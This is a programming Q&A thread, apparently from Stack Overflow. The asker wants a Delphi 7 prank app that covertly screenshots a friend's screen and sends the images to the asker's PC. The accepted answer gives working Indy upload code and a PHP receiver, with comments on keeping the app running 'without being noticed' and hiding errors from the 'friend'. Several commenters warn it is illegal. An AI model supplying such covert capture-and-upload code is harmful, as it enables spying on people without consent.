# Send a picture over the internet in Delphi 7

Tags: delphi, delphi-7

**The Idea**

Me and a friend want to to play a joke on another friend and make a delphi application that takes screen shots of our friends screen and then send it to my computer.

**The Question**

The problem is that me and my friend have no idea how to send the image to my computer. Any idea how?

**I have tried what GolezTrol said**

This is the code for that (starts at line 27)

```
 procedure TForm1.Button1Click(Sender: TObject);
 var
   Params:  TIMultipartFormDataStream;
   Response1: TStringStream;
 begin
  try
    Params := TIMultipartFormDataStream.create;
    Response1 := TStringStream.Create;
    try
      Params.AddFile('file', 'C:\temp\YourTempImageName.jpg', 'image/jpg');
      IdHTTP1.Post('http://localhost/uploadimage.php', Params, Response1);
    finally
      Params.Free;
      Response1.Free;
    end;
end;
```

(I'm busy trying to make it work.)

**Extra Information**
After reconsidering I don't really see the funny side anymore. By the way I was not going to steel my friends identity. After telling him what we wanted to do he challenged us to try (He bet we couldn't do it).

Comment: Of course it is possible (in *any* language used to write Win32 applications)

Comment: Yes, either you use Winsock or WinInet or some higher-level third-party components, such as the Indy components.

Comment: I would recommend HTTP if Images is the only thing you're sending. Using Indy, implement a `TIdHTTP` in the client apps (which need to get images) and create an HTTP Server (Web Server) separately for the server. This of course is assuming the clients will connect directly to the server which if you want peer-to-peer transfers, you're looking into a different ballgame.

Comment: @jerry Dodge Me and my friend want to play a joke on another friend by makeing an application that takes a screen shot every 1min then its supposed to send it to my computer.

Comment: That doesn't sound like much of a joke. Are you sure it's legal?

Comment: This is not a "please write my code for me" site. Please do your own research to figure out how to get started, and then you can come back here with specific questions about solving problems you run into writing the code. (And if I was your "friend", I wouldn't be if you stole information off my machine without my knowledge or permission, and depending on where you live you could be committing a felony in doing so and could end up in legal trouble. You might want to at least think twice before pursuing this any further.)

Comment: I tried to pull pranks like this using fake DOS prompts and 'hacking' autoexec.bat. Never realized back then it would be illegal. Where's the fun? :)

Comment: Oh, yes, just add `autoexec` to the end of the file. Did so in my old school.

Comment: Remote desktop will start a new session, but you could just use vnc to do this. Search google for 'ultravnc' if you don't know it.

Comment: It's out of order to ask for ideas and then say "If you want to answer please make it very detailed". Please take a read of the [faq]

Comment: @GolezTrol: Back in the days we pranked using `autoexec.bat`, there wasn't an internet and wasn't as much identity theft. Today is different, and so are the laws in many places.

Comment: Beware privacy breaches. If you get images from your "friends" screen with private information, you will be breaking laws. In the UK such activity would be plain illegal and get you to prison. I would suggest instead that you focus on something simpler like a wedgie.

Comment: @DavidHeffernan I edited it We reconsidered our idea and now we no longer thinks its a great idea nor funny.

Comment: @mj2008  I edited it We reconsidered our idea and now we no longer thinks its a great idea nor funny.

Comment: @KenWhite I edited it We reconsidered our idea and now we no longer thinks its a great idea nor funny.

Comment: I think this edit to my question has been the best one

Answer (score 6, accepted):

Over HTTP you can send images in a Multipart Formdata post request. This is the same kind of request when you upload an image through a HTML form. The server won't know the difference. :)

Uploading is very easy. You create a MultipartFormDataStream, which had methods for adding files. Then, you can send it using a TIdHTTP. You can create that at runtime, but you can also just drop it on your form if you have the Indy components installed. I did, and left it with its default name of `IdHTTP1`.

In the example I load a file from disk, but it may be possible to load it directly from a stream. I haven't tried that, but I think loading a temp file will do.

Delphi code for the client:

```
var
  Params: TIdMultipartFormDataStream;
  Response: TStringStream;
begin
  try
    Params := TIdMultipartFormDataStream.Create;
    Response := TStringStream.Create;
    try
      Params.AddFile('file', 'C:\temp\YourTempImageName.jpg', 'image/jpg');

      // Substiture real url below.
      IdHTTP1.Post('http://localhost/uploadimage.php', Params, Response);

      // For testing purposes, you may show the response.
      //Memo1.Text := Response.DataString;
    finally
      // Free resources. Important if you want your app to keep running
      // without being noticed.
      Params.Free;
      Response.Free;
    end;
  except
    // Log exception for testing. Don't let it show to the 'friend'.
    //on e: Exception d
    //  Memo1.Lines.Add(e.Message);
  end;
end;
```

For the server, you can use any PHP enabled server that allows saving files. I've included the most minimal example below. Of course you can write the server software in other languages too, including Delphi. But if you write it in Delphi, you will need a Windows server allways available.

Example PHP code for the server:

```
<?php
if (isset($_FILES['file']) && $_FILES['file']['error'] == UPLOAD_ERR_OK)
{
  // Choose your proper directory here.
  $target = 'C:\\ff\\uploads\\' . time();
  $result = move_uploaded_file($_FILES['file']['tmp_name'], $target);
  if (!$result) {
    echo 'Cannot copy'; // This response is sent to the client.
  }
}
```

Comment: In this line of code
"Params.AddFile('file', 'C:\temp\YourTempImageName.jpg', 'image/jpg');"
 can I change the "'C:\temp\YourTempImageName.jpg'," to image1, (The image is on the form).

Comment: I copied the code exactly. When i run the program it says [Error] Unit1.pas(29): Undeclared identifier: 'TIdMultipartFormDataStream' for the second line (after var).
I havent installed Indy (if this is a problem but according to me Delphi 7 comes with Indy, or am I wrong?)

Comment: You'll need to include the unit `IdMultipartFormDataStream`. But I expected some basic understanding about Delphi itself. You'll run into some other problems too, but I'm not going to answer them one by one in the comments here.

Comment: Where can I find IdMultipartFormDataStream unit

Comment: It's called `IdMultipartFormData`. But really, how did you ever get anything working if you can't find out which units to use?

Answer (score 1):

If you have some web-space that is accessible over FTP, you could use IdFTP or WinInet FTP functions. (I got 100MB of free web-space with the ADSL connection I have here.)

Comment: IdFTP is a fine alternative, but apparently OP doesn't know how to use either.